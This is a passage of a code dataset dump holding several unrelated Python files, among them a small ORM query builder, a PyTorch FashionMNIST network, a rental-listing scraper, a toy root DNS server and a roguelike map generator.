utf-8 -*-\n\nmain = list()\ns, p = [int(i) for i in input().split()]\n\nfor i in range(s):\n x, y = [int(i) for i in input().split()]\n main.append((x,'mark1'))\n main.append((y,'mark2'))\n \npoint = input().split()\nfor i in point:\n main.append((int(i),'p'))\n \nmain.sort()\n\nsegment = 0\npointsegdict = dict()\nfor i in main:\n if i[1] == 'mark1': segment += 1\n elif i[1] == 'mark2': segment -= 1\n else: \n pointsegdict[i[0]] = segment\n\nfill = ''\nfor i in point:\n fill += str(pointsegdict[int(i)]) + ' '\nprint(fill[:-1])\n","sub_path":"Algorithmic Toolbox/Solutions/Partha/Week 4/lott.py","file_name":"lott.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"73308670","text":"from LightMagic.db._sql_generator import _SqlGenerator\nfrom ._Tools import _Tools\n\n\nclass _Model(_Tools, _SqlGenerator):\n \"\"\" Базовая модель \"\"\"\n\n # Исключает из модели БД следующие параметры\n _exclude_from_db_model = []\n\n # Список полей, отдаваемый при выводе списка. Опциональный параметр. Если пустой список - возвращает все.\n _list_fields = []\n\n _model_fields = None\n\n def __init__(self, db, debug_mode=False):\n\n # Соединение с БД\n self.db = db\n\n # В случае True - для данной модели будут печататься запросы в БД и выводиться список аргументов.\n self.debug_mode = debug_mode\n\n # Сюда загружаем(кэшируем) список полей в модели\n self._model_fields = None\n\n # Автоматически заполняется при первом запросе\n self._primary_key = []\n\n # Добавляем стандартные имена-исключения\n fields_to_exclude = ['db', 'debug_mode'] # TODO should be defined at class-level\n for field_name in fields_to_exclude:\n if field_name not in self._exclude_from_db_model:\n self._exclude_from_db_model.append(field_name)\n\n # Флаг сохранения в БД. НЕ ПРОВЕРЯЕТСЯ В БД. Меняется на основе методов load/create\n self._is_created = False\n\n self._light_magic_values = {}\n\n def get_table_name(self):\n \"\"\" Возвращает имя таблицы. Необходимо переопределить. \"\"\"\n raise ValueError\n\n def get_model_fields(self, force_reload=False):\n \"\"\" Возвращает поля модели \"\"\"\n if self._check_cache('model_fields') is None and force_reload is False:\n model_fields_t = tuple(filter(\n lambda x: (x if not str(x).startswith('_') and not callable(\n getattr(self, x)) and x not in self._exclude_from_db_model else None), dir(self)))\n\n model_fields = {key: self.__class__.__dict__[key].__class__ for key in model_fields_t}\n self._set_cache('model_fields', model_fields)\n\n return self._get_cache('model_fields')\n\n @classmethod\n def _dig_class(cls, key, oclass):\n if key in oclass.__dict__:\n return oclass.__dict__[key]\n else:\n for p_class in oclass.__bases__:\n if p_class == object:\n continue\n elif key in p_class.__dict__:\n return p_class.__dict__[key]\n else:\n return cls._dig_class(key, p_class)\n raise AttributeError('Key %s not found' % key)\n\n def get_additional_parametr(self, key, parament):\n \"\"\" Возвращает информацию о расширенном параметре \"\"\"\n # Добавить кэширование\n keyobject = self._dig_class(key, self.__class__)\n return getattr(keyobject, parament)\n\n def _get_primary_keys(self):\n \"\"\" Возвращает первичный ключ \"\"\"\n if self._check_cache('primary_keys') is None:\n if len(self._primary_key) == 0:\n for key in self.get_model_fields():\n # Проверяем, что данный ключ является первичным ключем (возможно составным):\n try:\n if self.get_additional_parametr(key, 'db_primary_key') is True:\n self._primary_key.append(key)\n except:\n # Первичный ключ не задан\n pass\n\n self._set_cache('primary_keys', self._primary_key)\n else:\n self._primary_key = self._get_cache('primary_keys')\n\n return self._primary_key\n\n def _create(self):\n \"\"\" Создает объект в БД \"\"\"\n data = []\n values = []\n fields = []\n for key in self.get_model_fields():\n if key in self._get_primary_keys():\n if self.get_additional_parametr(key, 'db_force_set_primary_key') is False:\n continue\n\n # Получаем исходное значение\n value = getattr(self, key)\n\n # Проверяем, что значение None\n if value is None:\n # Если default значение None\n value = self.get_additional_parametr(key, 'db_default_value')\n if value is None:\n continue\n\n # Получаем тип в БД\n db_type = self.get_additional_parametr(key, 'get_db_type')()\n if db_type is None:\n values.append('%s')\n else:\n values.append('%%s::%s' % (db_type))\n\n # Приводим значение к типу БД\n data.append(self.get_additional_parametr(key, 'db_serialize')(value))\n\n # Добавляем наименование поля\n fields.append(key)\n\n query = 'INSERT INTO {table_name} ({fields}) VALUES({values}) {index_keys}'.format(\n table_name=self.get_table_name(),\n fields=','.join(fields),\n values=','.join(values),\n index_keys=('RETURNING %s' % ','.join(self._get_primary_keys())) if len(\n self._get_primary_keys()) > 0 else ''\n )\n\n self._debug('create', query, data)\n\n return query, data\n\n def _get_list(self, fields=None, limit=100, offset=0, filter_condition=None, order_by=None, order_type='ASC'):\n \"\"\" Возвращает список записей \"\"\"\n\n if fields is None:\n fields = self.get_model_fields()\n # Делаем хитрый момент, для того, чтобы проверить - корректны ли все запрошенные поля\n else:\n for x in fields:\n if x not in self.get_model_fields():\n raise ValueError('Неверно заданы поля fields')\n\n where, data = self._parse_filter(filter_condition)\n\n # Формируем сортировку\n order_by_str = ''\n if order_by is not None:\n order_by_str = 'ORDER BY {order_by} {order_type}'.format(\n order_by=order_by,\n order_type=order_type\n )\n # Ограничения\n limit_str = ''\n if limit is not None:\n limit_str = 'LIMIT {limit} OFFSET {offset}'.format(\n limit=int(limit),\n offset=int(offset),\n )\n\n # Формируем запрос\n query = 'SELECT {fields} FROM {table_name} {where} {order_by_str} {limit_str}'.format(\n fields=', '.join(fields),\n table_name=self.get_table_name(),\n order_by_str=order_by_str,\n limit_str=limit_str,\n where='WHERE %s' % ' AND '.join(where) if len(where) > 0 else ''\n )\n\n self._debug('get_list', query, data)\n\n return query, data\n\n def _load(self, fields=None, by_primary_key=True, filter_condition=None):\n \"\"\" Загружает информацию о моделе \"\"\"\n # Логи\n if filter_condition is not None:\n where, data = self._parse_filter(filter_condition)\n\n # Ищем по primary key:†®\n elif by_primary_key is True:\n where = []\n data = []\n for key in self._get_primary_keys():\n where.append('%s=%%s' % key)\n data.append(self.get_additional_parametr(key, 'db_serialize')(getattr(self, key)))\n else:\n raise Exception('Введите условия загрузки объекта')\n\n if fields is None:\n fields = self.get_model_fields()\n\n query = 'SELECT {fields} FROM {table_name} WHERE {where}'.format(\n fields=','.join(fields),\n table_name=self.get_table_name(),\n where=' AND '.join(where)\n )\n self._debug('load', query, data)\n\n return query, data, fields\n\n def _remove(self):\n \"\"\" Удаляем объект\"\"\"\n where = []\n data = []\n # Ищем по primary key:\n for key in self._get_primary_keys():\n where.append('%s=%%s' % key)\n data.append(self.get_additional_parametr(key, 'db_serialize')(getattr(self, key)))\n if len(data) == 0:\n raise PermissionError('Error Primary Key')\n\n query = \"\"\"DELETE FROM {table_name} WHERE {primary_key}\"\"\".format(\n table_name=self.get_table_name(),\n primary_key=' AND '.join(where)\n )\n\n self._debug('remove', query, data)\n\n return query, data\n\n def _update(self):\n \"\"\" Обновляем объект \"\"\"\n keys = []\n if self._check_cache('update_keys') is None:\n # Исключаем первичные ключи из обновления\n updated_fields = list(filter(lambda x: x not in self._get_primary_keys(), self.get_model_fields()))\n # WHERE\n where = []\n sub_query = []\n\n for key in updated_fields:\n db_type = self.get_additional_parametr(key, 'get_db_type')()\n if db_type is None:\n sub_query.append('{key}=%s'.format(key=key))\n else:\n sub_query.append('{key}=%s::{type}'.format(key=key, type=db_type))\n keys.append(key)\n\n # Ищем по primary key:\n for key in self._get_primary_keys():\n where.append('%s=%%s' % key)\n keys.append(key)\n\n query = \"\"\"UPDATE {table_name} SET {fields} WHERE {where}\"\"\".format(\n table_name=self.get_table_name(),\n fields=', '.join(sub_query),\n where=' AND '.join(where)\n )\n self._set_cache('update_query', query)\n self._set_cache('update_keys', keys)\n\n # Заполняем данные\n data = []\n for key in self._get_cache('update_keys'):\n value = getattr(self, key)\n if value is None:\n value = self.get_additional_parametr(key, 'db_default_value')\n\n data.append(self.get_additional_parametr(key, 'db_serialize')(value))\n\n # Проверка, что данные действительно загружены и есть ограничения\n if len(data) == 0:\n raise PermissionError('Error Primary Key')\n\n self._debug('update', self._get_cache('update_query'), data)\n return self._get_cache('update_query'), data\n\n def _set_cache(self, key, value):\n if self.__class__._compiled_queryies is None:\n self.__class__._compiled_queryies = {}\n\n self.__class__._compiled_queryies[key] = value\n\n def _get_cache(self, key):\n if self.__class__._compiled_queryies is None:\n self.__class__._compiled_queryies = {}\n\n return self.__class__._compiled_queryies[key]\n\n def _check_cache(self, key):\n if '_compiled_queryies' not in self.__class__.__dict__:\n self.__class__._compiled_queryies = {}\n\n return self.__class__._compiled_queryies.get(key)\n","sub_path":"LightMagic/db/_Model.py","file_name":"_Model.py","file_ext":"py","file_size_in_byte":11697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"482878817","text":"# -*- coding: utf-8 -*-\nimport random\n#import numpy as np\ndef guess_no(cnt=3):\n dest_no = random.randint(1,100) \n while cnt>0:\n cnt-=1\n try: \n guess = int(input('pls input a no: \\n'))\n except ValueError as e:\n print('pls key valid no,not character')\n continue\n if dest_no == guess:\n print('u r right')\n break\n elif dest_no < guess:\n print('bigger,%s time(s) left' %cnt)\n \n else:\n print('smaller,%s time(s) left' %cnt)\n \n print(dest_no)\n else:\n print('sorry,dest_no is %s' %dest_no)\n \n#guess_no()\n\nclass Guess_no(object):\n def __init__(self,cnt=5,minimum =1,maximum=100):\n# def __init__(self,cnt,minimum,maximum): \n self.cnt = cnt\n self.minimum = minimum\n self.maximum = maximum\n self.dest_no = random.randint(self.minimum,self.maximum)\n \n def guess(self):\n cnt = self.cnt\n while cnt > 0:\n cnt -= 1\n try:\n guess = int(input('pls input a no: \\n'))\n except ValueError as e:\n print('pls key valid no,not character')\n continue\n if self.dest_no == guess:\n print('u r right')\n break\n elif self.dest_no < guess:\n print('bigger,%s time(s) left' %cnt)\n \n else:\n print('smaller,%s time(s) left' %cnt)\n \n print(self.dest_no)\n else:\n print('sorry,u have tried %s times,the dest_no is %s' %(self.cnt,self.dest_no))\n \n#g = Guess_no(5,1,100)\ng = Guess_no()\ng.guess()","sub_path":"2-work/Python/python-Intv/from_Zen/guess_no.py","file_name":"guess_no.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"162528173","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ntrainSet = torchvision.datasets.FashionMNIST(\n root = \"./data/FashionMNIST\", #Extract\n train = True,#Extract\n download = True,#Extract\n transform = transforms.Compose([ #Transform\n transforms.ToTensor()\n ])\n) \n\nclass Network(nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n # Convolutional transformations\n # Zorg dat het aantal out_channels meer en meer wordt\n self.conv1 = nn.Conv2d(in_channels = 1, out_channels = 6, kernel_size = 5)\n self.conv2 = nn.Conv2d(in_channels = 6, out_channels = 12, kernel_size = 5)\n \n # Fully Connected layers\n # Zorg dat het aantal out_features minder en minder wordt\n self.fc1 = nn.Linear(in_features = 12*4*4, out_features = 120)\n self.fc2 = nn.Linear(in_features = 120, out_features = 60)\n self.out = nn.Linear(in_features = 60, out_features = 10)\n \n def forward(self, t):\n # Implementation of layers\n # (1) input layer\n t = t\n \n # (2) hidden conv layer 1\n t = self.conv1(t)\n t = F.relu(t)\n t = F.max_pool2d(t, kernel_size = 2, stride = 2)\n \n # (3) hidden conv layer 2\n t = self.conv2(t)\n t = F.relu(t)\n t = F.max_pool2d(t, kernel_size = 2, stride = 2)\n \n # (4) hidden linear layer 1\n t = t.reshape(-1, 12*4*4)\n t = self.fc1(t)\n t = F.relu(t)\n \n # (5) hidden linear layer 2\n t = self.fc2(t)\n t = F.relu(t)\n \n # (6) output linear layer\n t = self.out(t)\n # Normaal zou je bij de output layer een softmax uitvoeren na een serie van relu operaties\n # De loss/cost functie die we gaan toepassen maakt al impliciet gebruik van de softmax \n #t = F.softmax(t, dim = 1) \n return t\n\nnetwork = Network()\nsample = next(iter(trainSet))\nimage, label = sample\npred = network(image.unsqueeze(0))\npred","sub_path":"pytorch.py","file_name":"pytorch.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250415939","text":"from __future__ import absolute_import, division, print_function\n\nimport pytest\npymongo = pytest.importorskip('pymongo')\n\nfrom datashape import discover, dshape\nfrom contextlib import contextmanager\nfrom toolz.curried import get\n\nfrom blaze.mongo import *\nfrom blaze.api.into import *\n\nconn = pymongo.MongoClient()\ndb = conn.test_db\n\n@contextmanager\ndef collection(data=[]):\n coll = db.tmp_collection\n if data:\n coll = into(coll, data)\n\n try:\n yield coll\n finally:\n coll.drop()\n\n\nbank = [{'name': 'Alice', 'amount': 100},\n {'name': 'Alice', 'amount': 200},\n {'name': 'Bob', 'amount': 100},\n {'name': 'Bob', 'amount': 200},\n {'name': 'Bob', 'amount': 300}]\n\ndef test_discover():\n with collection(bank) as coll:\n assert discover(coll) == dshape('5 * {amount: int64, name: string}')\n\n\ndef test_into():\n with collection([]) as coll:\n key = get(['name', 'amount'])\n assert set(into([], into(coll, bank), columns=['name', 'amount'])) ==\\\n set([('Alice', 100), ('Alice', 200), ('Bob', 100),\n ('Bob', 200), ('Bob', 300)])\n","sub_path":"blaze/tests/test_mongo.py","file_name":"test_mongo.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"106229178","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n'''\n\n@author: lenspace\n\n@license: (C) Copyright 2017-2018.\n\n@contact: ustbenspace@gmail.com\n\n@file: fang1.py\n\n@time: 2018/3/31 下午11:11\n\n@desc:\n\n'''\n\nfrom pymongo import MongoClient\nimport requests\nfrom fake_useragent import UserAgent\nfrom lxml import etree\nimport time\n\n\nclient = MongoClient()\ndb = client.fang\ntable_one = db.one\ntb_two = db.two\n\nua = UserAgent()\nhost = 'http://zu.fang.com'\n\ndef mylog(str):\n print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())) + ': ' + str)\n\ndef getHTMLText(url):\n try:\n headers = {\n 'User-Agent' : ua.random,\n }\n\n r = requests.get(url, headers=headers, timeout=20)\n sc = r.status_code\n print(sc)\n r.raise_for_status()\n r.encoding = r.apparent_encoding\n return r.text\n except:\n return url+\" 产生异常\"\n\nif __name__ == '__main__' :\n i = 1\n datas = table_one.find()\n for data in datas:\n mylog('正在爬取第{0}页'.format(i))\n i += 1\n\n area = data['area']\n url = data['url']\n mylog('url is ' + url)\n data.pop('_id')\n\n html = getHTMLText(url)\n s = etree.HTML(html)\n subareas = s.xpath('//*[@id=\"rentid_D04_08\"]/a[position()!=1]/text()')\n subhrefs = s.xpath('//*[@id=\"rentid_D04_08\"]/a[position()!=1]/@href')\n\n length = len(subareas)\n mylog('当前页面共有元素{0}'.format(length))\n\n j = 0\n while j < length:\n newData = {}\n newData['area'] = area\n newData['subarea'] = subareas[j]\n newData['url'] = host + subhrefs[j]\n tb_two.insert(newData)\n j += 1\n\n time.sleep(5)\n","sub_path":"fang/fang1.py","file_name":"fang1.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"440958384","text":"import os , time\nfiles = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\"]\nframes = []\nk = 1\nframes_path = \"./assets/frames/\"\nworking_dir = os.path.dirname(__file__)\n\nfor name in files:\n filepath = frames_path + name\n print(filepath)\n rel_path = os.path.relpath(filepath, working_dir)\n with open(rel_path, \"r\", encoding=\"utf8\") as f:\n #sabe every line in list \"f\"\n f = f.readlines()\n #append list f to list frames\n frames.append(f)\n\nwhile k == 1:\n\n for frame in frames:\n #clear the shell\n os.system('printf \"\\033c\"') #printf \"\\033c\"') \n print(\"\".join(frame))\n #print(\" TEST \")\n time.sleep(0.2)\n #clear the shell\n \n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"448065545","text":"'''\nName: Carlos Alvarenga\nStudent id: 5197501\nEmail: alvar357@umn.edu\nFilename: root_server.py\nDescription: Program encompasses the functionality of the root DNS server\n programs that either redirects the default local DNS server to the\n appropriate DNS server or directly contacts said DNS server to\n receive the response and send it back to the default local DNS server.\n'''\n\nimport sys\nimport socket\n\ndomains = {} # structure that contains domain ip-port information\n\ndef server_shutdown(sock):\n '''\n Function triggered by user's ctrl-c keyboard interrupt signaling server\n shutdown.Broadcast messages 'shutdown' are sent to all other servers\n notifying them of shutdown and socket connections are closed.\n '''\n print('\\nCommencing root DNS server shutdown')\n\n # Send broadcast message to default local DNS server\n s = socket.socket()\n s.connect(('127.0.0.1', 5352))\n s.send(\"shutdown\")\n s.close()\n\n # Send broadcast messages to remaining DNS servers\n for item in domains:\n s = socket.socket()\n ip = domains.get(item)[0]\n port = domains.get(item)[1]\n s.connect((ip, port))\n s.send(\"shutdown\")\n s.close()\n print('Root DNS server socket closed')\n sock.close()\n\ndef map_domains(filename):\n '''\n Function that maps .com, .org, .gov domains to appropriate port and ip\n numbers based on server.dat file and stores this information in appropriate\n data structure.\n '''\n file = open(filename, \"r\");\n try:\n for line in file:\n line = line.strip(\"\\n\").strip(\"\\r\")\n line = line.split(\" \")\n domains[line[0]] = [line[1].lower(), int(line[2])]\n finally:\n file.close()\n\ndef format_message(is_received, msg, server_id):\n '''\n Function that formats client message to replace id field with the id of the\n current DNS server to adhere to the project write-up template and send the\n message back to another server. The reformatted message is returned.\n '''\n msg_arr = msg.split(\", \")\n if is_received: # message is request from client\n return (server_id + ', ' + msg_arr[1] + ', ' + msg_arr[2])\n else:\n return (msg_arr[0] + ', ' + server_id + ', ' + msg_arr[2])\n\ndef resolve_query(client_msg, server_id):\n '''\n Function that determines whether the client request has to be sent directly\n to the .com, .org or .gov server or it should redirect the default local DNS\n server to one of the three mentioned server. The appropriate response\n message string for either case is returned.\n '''\n client_msg_arr = client_msg.split(\", \")\n hostname = client_msg_arr[1].split(\".\")\n domain = hostname[len(hostname)-1].lower()\n dns_server_ip = domains.get(domain)[0]\n dns_server_port = domains.get(domain)[1]\n if (client_msg_arr[2].lower() == 'i'): # iterative request\n return ('0x01, ' + server_id + ', ' + dns_server_ip + ', ' + str(dns_server_port))\n else: # recursive request\n s = socket.socket()\n s.connect((dns_server_ip, dns_server_port))\n print('Connected to DNS server ' + domain)\n s.send(client_msg.encode('utf-8'))\n print('Message sent to DNS server: ' + client_msg)\n response = s.recv(1024).decode('utf-8')\n print('Response received from DNS server: ' + response)\n s.close()\n print('DNS server socket closed')\n return format_message(False, response, server_id)\n\ndef talk_with_server(clientsocket, addr, server_id, shutdown):\n '''\n Function responsible for talking with DNS servers by accepting requests and\n sending out the correct responses. The server shutdown status after\n communication is returned.\n '''\n while True:\n client_msg = clientsocket.recv(1024).decode('utf-8')\n if not client_msg:\n break\n if client_msg == 'shutdown': # recieve broadcast message from another server\n shutdown = True\n break\n print('Message recieved from default local DNS server: ' + client_msg)\n client_msg = format_message(True, client_msg, server_id)\n response = resolve_query(client_msg, server_id)\n clientsocket.send(response.encode('utf-8'))\n print('Response sent to default local DNS server: ' + response)\n clientsocket.close()\n print('Default local DNS socket closed\\n')\n return shutdown\n\ndef server(server_id, server_port, mapping_file, servers_list):\n '''\n Main function where root DNS server connection is set up to recieve and send\n messages and is closed when appropriate.\n '''\n s = socket.socket() # Create a socket object\n ip = '127.0.0.1'\n shutdown = False # Track any existing server shutdown\n\n try:\n s.bind((ip, int(server_port))) # Bind to the port\n s.listen(5) # Now wait for client connection.\n print('Root DNS Server started!')\n print('Waiting for clients...')\n while True and not shutdown:\n c, addr = s.accept() # Establish connection with client.\n print ('Connect to default local DNS server' + str(addr))\n shutdown = talk_with_server(c, addr, server_id, shutdown)\n s.close()\n print('Root DNS server socket closed')\n except KeyboardInterrupt:\n server_shutdown(s)\n\nif __name__ == '__main__':\n map_domains(sys.argv[4])\n server(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\n","sub_path":"root_server.py","file_name":"root_server.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"272900419","text":"from character import *\nimport random\n\nclass Tile:\n blocked = True\n characterInTile = None\n token = \"\"\n #a tile of the map and its properties\n def __init__(self):\n self.blocked = False\n self.characterInTile = None\n self.token = \"-\"\n\n def getCharacter(self):\n return self.characterInTile\n\n def setCharacter(self,newCharacter):\n self.characterInTile = newCharacter\n\n def getBlocked(self):\n return self.blocked\n\n def setBlocked(self,blocked):\n self.blocked = blocked\n\n def setToken(self,newToken):\n self.token = newToken\n\n def getToken(self):\n return self.token\n\n def __str__(self):\n return self.token\n\nclass Room:\n xMin = 0\n xMax = 0\n yMin = 0\n yMax = 0\n size = 1.0\n prevXMax = 0\n prevYMax = 0\n\n def __init__(self, xMin, xMax, yMin, yMax, size):\n self.xMin = xMin\n self.xMax = xMax\n self.yMin = yMin\n self.yMax = yMax\n self.size = size\n self.prevXMax = xMax\n self.prevYMax = yMax\n\n def __str__(self):\n return \"x:\"+str(self.xMin)+\"-\"+str(self.xMax)+\" y:\"+str(self.yMin)+\"-\"+str(self.yMax)+\" size:\"+str(self.size)\n\n def getXMin(self):\n return self.xMin\n\n def setXMin(self, xMin):\n self.xMin = xMin\n\n def getXMax(self):\n return self.xMax\n\n def setXMax(self, xMax):\n self.xMax = xMax\n\n def getYMin(self):\n return self.yMin\n\n def setYMin(self, yMin):\n self.yMin = yMin\n\n def getYMax(self):\n return self.yMax\n\n def setYMax(self, yMax):\n self.yMax = yMax\n\n def getSize(self):\n return self.size\n\n def setSize(self, size):\n self.size = size\n\n def getPrevXMax(self):\n return self.prevXMax\n\n def setPrevXMax(self, prevXMax):\n self.prevXMax = prevXMax\n\n def getPrevYMax(self):\n return self.prevYMax\n\n def setPrevYMax(self, prevYMax):\n self.prevYMax = prevYMax\n\n def getCenterX(self):\n return self.xMin + int((self.xMax - self.xMin)/2)\n\n def getCenterY(self):\n return self.yMin + int((self.yMax - self.yMin)/2)\n\nclass Map:\n maxHeight = 0\n maxWidth = 0\n\n def __init__(self, l, h, nr):\n self.maxWidth = l\n self.maxHeight = h\n\n def getHeight(self):\n return self.maxHeight\n\n def getWidth(self):\n return self.maxWidth\n\nclass MapOfTiles(Map):\n tiles = []\n\n def __init__(self, w, h, nr):\n Map.__init__(self,w,h,nr)\n roomList = []\n roomList.append(Room(0,self.maxWidth,0,self.maxHeight,1.0))\n for i in range(0, self.maxHeight):\n newTileList = []\n for j in range(0, self.maxWidth):\n newTile = Tile()\n newTileList.append(newTile)\n self.tiles.append(newTileList)\n if(nr > 0):\n for i in range(1, nr):\n largestRoomSize = 0\n largestRoomNum = 0\n for roomNum in range(0, len(roomList)):\n if roomList[roomNum].getSize() > largestRoomSize:\n largestRoomSize = roomList[roomNum].getSize()\n largestRoomNum = roomNum\n # split vertically\n # print(roomList[largestRoomNum])\n if((roomList[largestRoomNum].getXMax() - roomList[largestRoomNum].getXMin()) >= (roomList[largestRoomNum].getYMax() - roomList[largestRoomNum].getYMin())):\n # print(\"dividing X axis\")\n roomList[largestRoomNum].setPrevXMax(roomList[largestRoomNum].getXMax())\n roomList[largestRoomNum].setXMax(int((roomList[largestRoomNum].getXMax() - roomList[largestRoomNum].getXMin())/2) + roomList[largestRoomNum].getXMin())\n roomList[largestRoomNum].setSize(roomList[largestRoomNum].getSize() / 2)\n roomList.append(Room(roomList[largestRoomNum].getXMax()+1, roomList[largestRoomNum].getPrevXMax(), roomList[largestRoomNum].getYMin(), roomList[largestRoomNum].getYMax(), roomList[largestRoomNum].getSize()))\n # split horizontally\n else:\n # print(\"dividing Y axis\")\n roomList[largestRoomNum].setPrevYMax(roomList[largestRoomNum].getYMax())\n roomList[largestRoomNum].setYMax(int((roomList[largestRoomNum].getYMax() - roomList[largestRoomNum].getYMin())/2) + roomList[largestRoomNum].getYMin())\n roomList[largestRoomNum].setSize(roomList[largestRoomNum].getSize() / 2)\n roomList.append(Room(roomList[largestRoomNum].getXMin(), roomList[largestRoomNum].getXMax(), roomList[largestRoomNum].getYMax() + 1, roomList[largestRoomNum].getPrevYMax(), roomList[largestRoomNum].getSize()))\n\n for room in roomList:\n # print(room)\n # print(\"center of room X:\" + str(room.getCenterX()) + \"Y:\" + str(room.getCenterY()))\n yMinBound = random.randint(room.getYMin(),room.getCenterY())-1\n yMaxBound = random.randint(room.getCenterY()+2,room.getYMax())\n # print(\"Y room size:\" + str(yMinBound) + \"-\" + str(yMaxBound))\n xMinBound = random.randint(room.getXMin(), room.getCenterX())-1\n xMaxBound = random.randint(room.getCenterX()+2,room.getXMax())\n # print(\"X room size:\" + str(xMinBound) + \"-\" + str(xMaxBound))\n for i in range(yMinBound, yMaxBound):\n self.tiles[i][xMaxBound-1].setToken(\"#\")\n self.tiles[i][xMaxBound-1].setBlocked(True)\n self.tiles[i][xMinBound].setToken(\"#\")\n self.tiles[i][xMinBound].setBlocked(True)\n for j in range(xMinBound, xMaxBound):\n self.tiles[yMaxBound-1][j].setToken(\"#\")\n self.tiles[yMaxBound-1][j].setBlocked(True)\n self.tiles[yMinBound][j].setToken(\"#\")\n self.tiles[yMinBound][j].setBlocked(True)\n for i in range(0, self.maxHeight):\n # print(self.maxWidth-2)\n # print(i)\n self.getTile(i,self.maxWidth-1).setToken(\"#\")\n self.getTile(i,self.maxWidth-1).setBlocked(True)\n self.getTile(i,0).setToken(\"#\")\n self.getTile(i,0).setBlocked(True)\n for i in range(0, self.maxWidth):\n self.getTile(self.maxHeight-1,i).setToken(\"#\")\n self.getTile(self.maxHeight-1,i).setBlocked(True)\n self.getTile(0,i).setToken(\"#\")\n self.getTile(0,i).setBlocked(True)\n\n def getTile(self,y,x):\n # print(x)\n # print(y)\n return self.tiles[y][x]\n\n # return 1 if successful insert, 0 otherwise\n def insertCharacter(self, y, x, newCharacter):\n if(self.getTile(y,x).getBlocked() == True):\n return 0\n else:\n # print(str(y) + \":\" + str(x))\n self.getTile(y,x).setCharacter(newCharacter)\n self.getTile(y,x).setBlocked(True)\n return 1\n\n def removeCharacter(self, charToRemove):\n yx = self.getPlayerLocation(charToRemove)\n self.getTile(yx[0],yx[1]).setCharacter(None)\n self.getTile(yx[0],yx[1]).setBlocked(False)\n\n def getDirectionToCharacter(self, baseChar, targetChar):\n yxb = self.getPlayerLocation(baseChar)\n yxt = self.getPlayerLocation(targetChar)\n # print(\"base char \" + str(yxb))\n # print(\"target char \" + str(yxt))\n if(yxb[0] < yxt[0] and yxb[1] > yxt[1]):\n return 1\n if(yxb[0] < yxt[0] and yxb[1] == yxt[1]):\n return 2\n if(yxb[0] < yxt[0] and yxb[1] < yxt[1]):\n return 3\n if(yxb[0] == yxt[0] and yxb[1] > yxt[1]):\n return 4\n if(yxb[0] == yxt[0] and yxb[1] < yxt[1]):\n return 6\n if(yxb[0] > yxt[0] and yxb[1] > yxt[1]):\n return 7\n if(yxb[0] > yxt[0] and yxb[1] == yxt[1]):\n return 8\n if(yxb[0] > yxt[0] and yxb[1] < yxt[1]):\n return 9\n\n def isCharacterAdjacentToTile(self, py, px, target):\n retVal = False\n for y in range(py - 1, py + 1):\n for x in range(px-1, px + 1):\n if(x < 0 or x > self.maxWidth - 1 or y < 0 or y > self.maxHeight - 1):\n pass\n elif(self.getTile(y,x).getCharacter() != None):\n if(self.getTile(y,x).getCharacter().getID() == target.getID()):\n retVal = True\n break\n return retVal\n\n def isCharacterInRangeOfCharacter(self, baseChar, targetChar, rangeModifier):\n yxb = self.getPlayerLocation(baseChar)\n yxt = self.getPlayerLocation(targetChar)\n yInRange = False\n xInRange = False\n if((yxb[0] >= yxt[0]-rangeModifier) and (yxb[0] <= yxt[0]+rangeModifier)):\n yInRange = True\n if((yxb[1] >= yxt[1]-rangeModifier) and (yxb[1] <= yxt[1]+rangeModifier)):\n xInRange = True\n if(xInRange == True and yInRange == True):\n return True\n else:\n return False\n\n def isCharacterAdjacentToCharacter(self, baseChar, targetChar):\n yxb = self.getPlayerLocation(baseChar)\n yxt = self.getPlayerLocation(targetChar)\n yInRange = False\n xInRange = False\n if((yxb[0] >= yxt[0]-1) and (yxb[0] <= yxt[0]+1)):\n yInRange = True\n if((yxb[1] >= yxt[1]-1) and (yxb[1] <= yxt[1]+1)):\n xInRange = True\n if(xInRange == True and yInRange == True):\n return True\n else:\n return False\n\n # creates yxpair with absolute value between two chars\n def getDistanceTo(self, initChar, toChar):\n yx1 = self.getPlayerLocation(initChar)\n yx2 = self.getPlayerLocation(toChar)\n yDist = abs(yx2[0] - yx1[0])\n xDist = abs(yx2[1] - yx1[1])\n return [yDist, xDist]\n\n def getVisibleChars(self, characterLooking, sightDistance):\n listOfCharactersFound = []\n yxpair = self.getPlayerLocation(characterLooking)\n chary = yxpair[0]\n charx = yxpair[1]\n for y in range(chary - sightDistance, chary + sightDistance):\n for x in range(charx - sightDistance, charx + sightDistance):\n # print(\"maxX:\" + str(self.maxWidth) + \" maxY:\" + str(self.maxHeight))\n # print(\"X:\" + str(x) + \" Y:\" + str(y))\n if(x < 0 or x > self.maxWidth - 1 or y < 0 or y > self.maxHeight - 1):\n pass\n # print(\"skipped\")\n elif(self.getTile(y,x).getCharacter() != None):\n foundChar = self.getTile(y,x).getCharacter()\n # we found a character in range\n # check to make sure it isn't the player\n if(characterLooking.getID() == foundChar.getID()):\n break\n # print(\"character in range: \" + str(foundChar.getID()) + \"[\" + str(y) + \",\" + str(x) 